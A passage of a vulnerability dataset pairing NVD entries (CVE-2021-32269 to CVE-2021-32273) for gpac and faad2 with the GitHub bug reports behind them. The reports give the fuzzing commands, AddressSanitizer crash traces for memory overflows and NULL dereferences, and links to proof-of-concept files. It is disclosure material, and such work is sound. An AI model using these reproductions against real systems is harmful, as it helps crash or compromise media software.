isomedia/box_dump.c:1296 #20 0x55ad61979ed0 in gf_isom_box_dump isomedia/box_funcs.c:1926 #21 0x55ad6192490a in gf_isom_box_array_dump isomedia/box_dump.c:101 #22 0x55ad6197a057 in gf_isom_box_dump_done isomedia/box_funcs.c:1933 #23 0x55ad61928bb8 in trak_box_dump isomedia/box_dump.c:550 #24 0x55ad61979ed0 in gf_isom_box_dump isomedia/box_funcs.c:1926 #25 0x55ad6192490a in gf_isom_box_array_dump isomedia/box_dump.c:101 #26 0x55ad6197a057 in gf_isom_box_dump_done isomedia/box_funcs.c:1933 #27 0x55ad61925df0 in moov_box_dump isomedia/box_dump.c:217 #28 0x55ad61979ed0 in gf_isom_box_dump isomedia/box_funcs.c:1926 #29 0x55ad61924c92 in gf_isom_dump isomedia/box_dump.c:135 #30 0x55ad612fef09 in dump_isom_xml /home/seviezhou/gpac/applications/mp4box/filedump.c:1671 #31 0x55ad612d0754 in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5550 #32 0x7f91cfa50b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #33 0x55ad612afbe9 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x280be9) 0x60200000e054 is located 0 bytes to the right of 4-byte region [0x60200000e050,0x60200000e054) allocated by thread T0 here: #0 0x7f91d0abc612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x55ad62bea6a9 in url_box_read isomedia/box_code_base.c:580 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? Shadow bytes around the buggy address: 0x0c047fff9bb0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 02 fa 0x0c047fff9bc0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9bd0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9be0: fa fa 00 00 fa fa 00 05 fa fa 00 00 fa fa 00 00 0x0c047fff9bf0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff9c00: fa fa 00 fa fa fa 00 00 fa fa[04]fa fa fa 00 00 0x0c047fff9c10: fa fa 00 00 fa fa 00 05 fa fa 00 00 fa fa 00 00 0x0c047fff9c20: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9c30: fa fa 00 00 fa fa 00 00 fa fa fd fa fa fa 00 fa 0x0c047fff9c40: fa fa 00 00 fa fa 00 00 fa fa 00 07 fa fa fd fa 0x0c047fff9c50: fa fa 00 02 fa fa 04 fa fa fa fd fa fa fa 07 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==66502==ABORTING ``` ## POC [heap-overflow-url_box_dump-box_dump-350.zip](https://github.com/gpac/gpac/files/5175604/heap-overflow-url_box_dump-box_dump-350.zip)
A heap-buffer-overflow in box_dump.c:350
https://api.github.com/repos/gpac/gpac/issues/1587/comments
0
2020-09-04T15:05:21Z
2020-09-07T07:20:45Z
https://github.com/gpac/gpac/issues/1587
693,270,293
1,587
2,513
CVE-2021-32269
2021-09-20T16:15:10.003
An issue was discovered in gpac through 20200801. A NULL pointer dereference exists in the function ilst_item_box_dump located in box_dump.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1574" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1574" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA1FE1D-17AE-45F9-A7BD-A8316EE859D6", "versionEndExcluding": "1.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1574
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [2aa266](https://github.com/gpac/gpac/commit/2aa266dfaab6aaad9f9f4f216ad7d1e62adc7fa0)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -diso -out /dev/null @@ ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==77583==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x555d67a9030a bp 0x61600000cf80 sp 0x7ffc245f5240 T0) #0 0x555d67a90309 in ilst_item_box_dump isomedia/box_dump.c:3641 #1 0x555d67ac2749 in gf_isom_box_dump isomedia/box_funcs.c:1923 #2 0x555d67a6caba in gf_isom_dump isomedia/box_dump.c:135 #3 0x555d67449ce9 in dump_isom_xml /home/seviezhou/gpac/applications/mp4box/filedump.c:1670 #4 0x555d6741afa4 in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5548 #5 0x7fe303b6bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x555d673f8f09 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x27ff09) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_dump.c:3641 ilst_item_box_dump ==77583==ABORTING ``` ## POC [SEGV-ilst_item_box_dump-box_dump-3641.zip](https://github.com/gpac/gpac/files/5066977/SEGV-ilst_item_box_dump-box_dump-3641.zip)
A Segmentation fault in box_dump.c:3641
https://api.github.com/repos/gpac/gpac/issues/1574/comments
0
2020-08-13T03:20:26Z
2020-09-01T16:00:16Z
https://github.com/gpac/gpac/issues/1574
678,118,496
1,574
2,514
CVE-2021-32270
2021-09-20T16:15:10.053
An issue was discovered in gpac through 20200801. A NULL pointer dereference exists in the function vwid_box_del located in box_code_base.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1586" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1586" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA1FE1D-17AE-45F9-A7BD-A8316EE859D6", "versionEndExcluding": "1.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1586
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [5a884e](https://github.com/gpac/gpac/commit/5a884e376e1f67b3d40ec91c0b70ab49219fe3cd)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -diso -out /dev/null @@ ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==14934==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x556b734996bc bp 0x0c0c00001d9e sp 0x7fffb5212f80 T0) #0 0x556b734996bb in vwid_box_del isomedia/box_code_base.c:11579 #1 0x556b721a79de in gf_isom_box_del isomedia/box_funcs.c:1668 #2 0x556b721ab705 in gf_isom_box_parse_ex isomedia/box_funcs.c:295 #3 0x556b721ac7a1 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #4 0x556b721e2f9c in gf_isom_parse_movie_boxes isomedia/isom_intern.c:259 #5 0x556b721ede7e in gf_isom_parse_movie_boxes isomedia/isom_intern.c:247 #6 0x556b721ede7e in gf_isom_open_file isomedia/isom_intern.c:740 #7 0x556b71b167df in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5333 #8 0x7f5bcfaeeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x556b71ae9be9 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x280be9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_code_base.c:11579 vwid_box_del ==14934==ABORTING ``` ## POC [SEGV-vwid_box_del-box_code_base-11579.zip](https://github.com/gpac/gpac/files/5175561/SEGV-vwid_box_del-box_code_base-11579.zip)
A Segmentation fault in box_code_base.c:11579
https://api.github.com/repos/gpac/gpac/issues/1586/comments
0
2020-09-04T14:58:11Z
2020-09-07T07:20:45Z
https://github.com/gpac/gpac/issues/1586
693,262,344
1,586
2,515
CVE-2021-32271
2021-09-20T16:15:10.100
An issue was discovered in gpac through 20200801. A stack-buffer-overflow exists in the function DumpRawUIConfig located in odf_dump.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1575" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1575" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA1FE1D-17AE-45F9-A7BD-A8316EE859D6", "versionEndExcluding": "1.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1575
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [2aa266](https://github.com/gpac/gpac/commit/2aa266dfaab6aaad9f9f4f216ad7d1e62adc7fa0)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -disox -x3d -diod -latm -keep-utc -out /dev/null @@ ## AddressSanitizer output ``` ================================================================= ==64471==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc9b2e916f at pc 0x562be4afcd8d bp 0x7ffc9b2e8f10 sp 0x7ffc9b2e8f00 WRITE of size 1 at 0x7ffc9b2e916f thread T0 #0 0x562be4afcd8c in DumpRawUIConfig odf/odf_dump.c:887 #1 0x562be4b3b57e in gf_odf_dump_dcd odf/odf_dump.c:974 #2 0x562be4b18eb0 in gf_odf_dump_desc odf/odf_dump.c:113 #3 0x562be4b32b81 in gf_odf_dump_esd odf/odf_dump.c:536 #4 0x562be4b18e58 in gf_odf_dump_desc odf/odf_dump.c:111 #5 0x562be4844bc6 in esds_box_dump isomedia/box_dump.c:1221 #6 0x562be488d749 in gf_isom_box_dump isomedia/box_funcs.c:1923 #7 0x562be483776a in gf_isom_box_array_dump isomedia/box_dump.c:101 #8 0x562be488d89c in gf_isom_box_dump_done isomedia/box_funcs.c:1930 #9 0x562be483e636 in audio_sample_entry_box_dump isomedia/box_dump.c:750 #10 0x562be488d749 in gf_isom_box_dump isomedia/box_funcs.c:1923 #11 0x562be483776a in gf_isom_box_array_dump isomedia/box_dump.c:101 #12 0x562be488d89c in gf_isom_box_dump_done isomedia/box_funcs.c:1930 #13 0x562be4840892 in stsd_box_dump isomedia/box_dump.c:857 #14 0x562be488d749 in gf_isom_box_dump isomedia/box_funcs.c:1923 #15 0x562be483776a in gf_isom_box_array_dump isomedia/box_dump.c:101 #16 0x562be488d89c in gf_isom_box_dump_done isomedia/box_funcs.c:1930 #17 0x562be4839fa5 in stbl_box_dump isomedia/box_dump.c:331 #18 0x562be488d749 in gf_isom_box_dump isomedia/box_funcs.c:1923 #19 0x562be483776a in gf_isom_box_array_dump isomedia/box_dump.c:101 #20 0x562be488d89c in gf_isom_box_dump_done isomedia/box_funcs.c:1930 #21 0x562be4844d15 in minf_box_dump isomedia/box_dump.c:1236 #22 0x562be488d749 in gf_isom_box_dump isomedia/box_funcs.c:1923 #23 0x562be483776a in gf_isom_box_array_dump isomedia/box_dump.c:101 #24 0x562be488d89c in gf_isom_box_dump_done isomedia/box_funcs.c:1930 #25 0x562be48459a5 in mdia_box_dump isomedia/box_dump.c:1279 #26 0x562be488d749 in gf_isom_box_dump isomedia/box_funcs.c:1923 #27 0x562be483776a in gf_isom_box_array_dump isomedia/box_dump.c:101 #28 0x562be488d89c in gf_isom_box_dump_done isomedia/box_funcs.c:1930 #29 0x562be483bf01 in trak_box_dump isomedia/box_dump.c:533 #30 0x562be488d749 in gf_isom_box_dump isomedia/box_funcs.c:1923 #31 0x562be483776a in gf_isom_box_array_dump isomedia/box_dump.c:101 #32 0x562be488d89c in gf_isom_box_dump_done isomedia/box_funcs.c:1930 #33 0x562be4838e3e in moov_box_dump isomedia/box_dump.c:217 #34 0x562be488d749 in gf_isom_box_dump isomedia/box_funcs.c:1923 #35 0x562be4837aba in gf_isom_dump isomedia/box_dump.c:135 #36 0x562be4214ce9 in dump_isom_xml /home/seviezhou/gpac/applications/mp4box/filedump.c:1670 #37 0x562be41e5fa4 in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5548 #38 0x7f7a080ccb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #39 0x562be41c3f09 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x27ff09) Address 0x7ffc9b2e916f is located in stack of thread T0 at offset 511 in frame #0 0x562be4af934f in DumpRawUIConfig odf/odf_dump.c:875 This frame has 3 object(s): [32, 35) 'szPh' [96, 196) 'ind_buf' [256, 511) 'devName' <== Memory access at offset 511 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow odf/odf_dump.c:887 DumpRawUIConfig Shadow bytes around the buggy address: 0x1000136551d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000136551e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 0x1000136551f0: f1 f1 03 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00 0x100013655200: 00 00 00 00 00 00 04 f4 f4 f4 f2 f2 f2 f2 00 00 0x100013655210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100013655220: 00 00 00 00 00 00 00 00 00 00 00 00 00[07]f3 f3 0x100013655230: f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 0x100013655240: 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 0x100013655250: 00 00 00 00 00 00 04 f4 f4 f4 f3 f3 f3 f3 00 00 0x100013655260: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 0x100013655270: 00 00 00 00 00 00 00 00 00 00 04 f4 f4 f4 f3 f3 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==64471==ABORTING ``` ## POC [stack-overflow-DumpRawUIConfig-odf_dump-887.zip](https://github.com/gpac/gpac/files/5077984/stack-overflow-DumpRawUIConfig-odf_dump-887.zip)
A stack-buffer-overflow in odf_dump.c:887
https://api.github.com/repos/gpac/gpac/issues/1575/comments
0
2020-08-15T01:36:37Z
2020-09-01T16:03:15Z
https://github.com/gpac/gpac/issues/1575
679,475,781
1,575
2,516
CVE-2021-32272
2021-09-20T16:15:10.143
An issue was discovered in faad2 before 2.10.0. A heap-buffer-overflow exists in the function stszin located in mp4read.c. It allows an attacker to cause Code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/commit/1b71a6ba963d131375f5e489b3b25e36f19f3f24" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/57" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/commit/1b71a6ba963d131375f5e489b3b25e36f19f3f24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/57" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:faad2_project:faad2:*:*:*:*:*:*:*:*", "matchCriteriaId": "AF3BA5A2-CCE7-471A-B083-FD9557B427A9", "versionEndExcluding": "2.10.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/knik0/faad2/issues/57
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "knik0", "faad2" ]
## System info Ubuntu x86_64, clang 6.0, faad (latest master [1073ae](https://github.com/knik0/faad2/commit/1073aeef823cafd844704389e9a497c257768e2f)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-shared=no ## Command line ./frontend/faad -w -b 5 @@ ## AddressSanitizer output ``` *********** Ahead Software MPEG-4 AAC Decoder V2.9.2 ****************** Build: Aug 30 2020 Copyright 2002-2004: Ahead Software AG http://www.audiocoding.com bug tracking: https://sourceforge.net/p/faac/bugs/ Floating point version This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License. ************************************************************************** **** MP4 header **** Brand: isom(version 512) Compatible brands: isomiso2mp41 *track media type: 'soun': OK ================================================================= ==36828==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000010 at pc 0x00000051eaca bp 0x7ffe7db7e7f0 sp 0x7ffe7db7e7e8 WRITE of size 4 at 0x602000000010 thread T0 #0 0x51eac9 in stszin /home/seviezhou/faad2/frontend/mp4read.c:355:29 #1 0x517c4d in parse /home/seviezhou/faad2/frontend/mp4read.c:766:19 #2 0x517ec2 in parse /home/seviezhou/faad2/frontend/mp4read.c:790:24 #3 0x517ec2 in parse /home/seviezhou/faad2/frontend/mp4read.c:790:24 #4 0x517ec2 in parse /home/seviezhou/faad2/frontend/mp4read.c:790:24 #5 0x517ec2 in parse /home/seviezhou/faad2/frontend/mp4read.c:790:24 #6 0x518cf8 in moovin /home/seviezhou/faad2/frontend/mp4read.c:867:15 #7 0x517c4d in parse /home/seviezhou/faad2/frontend/mp4read.c:766:19 #8 0x5169a5 in mp4read_open /home/seviezhou/faad2/frontend/mp4read.c:1005:16 #9 0x52de44 in decodeMP4file /home/seviezhou/faad2/frontend/main.c:830:9 #10 0x52de44 in faad_main /home/seviezhou/faad2/frontend/main.c:1323 #11 0x7f92a07fc83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #12 0x41a698 in _start (/home/seviezhou/faad2/frontend/faad+0x41a698) 0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011) allocated by thread T0 here: #0 0x4de8a8 in __interceptor_malloc /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88 #1 0x51e387 in stszin /home/seviezhou/faad2/frontend/mp4read.c:348:28 #2 0x517c4d in parse /home/seviezhou/faad2/frontend/mp4read.c:766:19 #3 0x517ec2 in parse /home/seviezhou/faad2/frontend/mp4read.c:790:24 #4 0x517ec2 in parse /home/seviezhou/faad2/frontend/mp4read.c:790:24 #5 0x517ec2 in parse /home/seviezhou/faad2/frontend/mp4read.c:790:24 #6 0x517ec2 in parse /home/seviezhou/faad2/frontend/mp4read.c:790:24 #7 0x518cf8 in moovin /home/seviezhou/faad2/frontend/mp4read.c:867:15 #8 0x517c4d in parse /home/seviezhou/faad2/frontend/mp4read.c:766:19 #9 0x5169a5 in mp4read_open /home/seviezhou/faad2/frontend/mp4read.c:1005:16 #10 0x52de44 in decodeMP4file /home/seviezhou/faad2/frontend/main.c:830:9 #11 0x52de44 in faad_main /home/seviezhou/faad2/frontend/main.c:1323 #12 0x7f92a07fc83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/faad2/frontend/mp4read.c:355:29 in stszin Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa[01]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==36828==ABORTING ``` ## POC [heap-overflow-stszin-mp4read-355.zip](https://github.com/knik0/faad2/files/5147022/heap-overflow-stszin-mp4read-355.zip)
A heap-buffer-overflow in mp4read.c:355:29
https://api.github.com/repos/knik0/faad2/issues/57/comments
0
2020-08-30T15:27:09Z
2020-08-31T08:55:06Z
https://github.com/knik0/faad2/issues/57
688,738,712
57
2,517
CVE-2021-32273
2021-09-20T16:15:10.187
An issue was discovered in faad2 through 2.10.0. A stack-buffer-overflow exists in the function ftypin located in mp4read.c. It allows an attacker to cause Code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
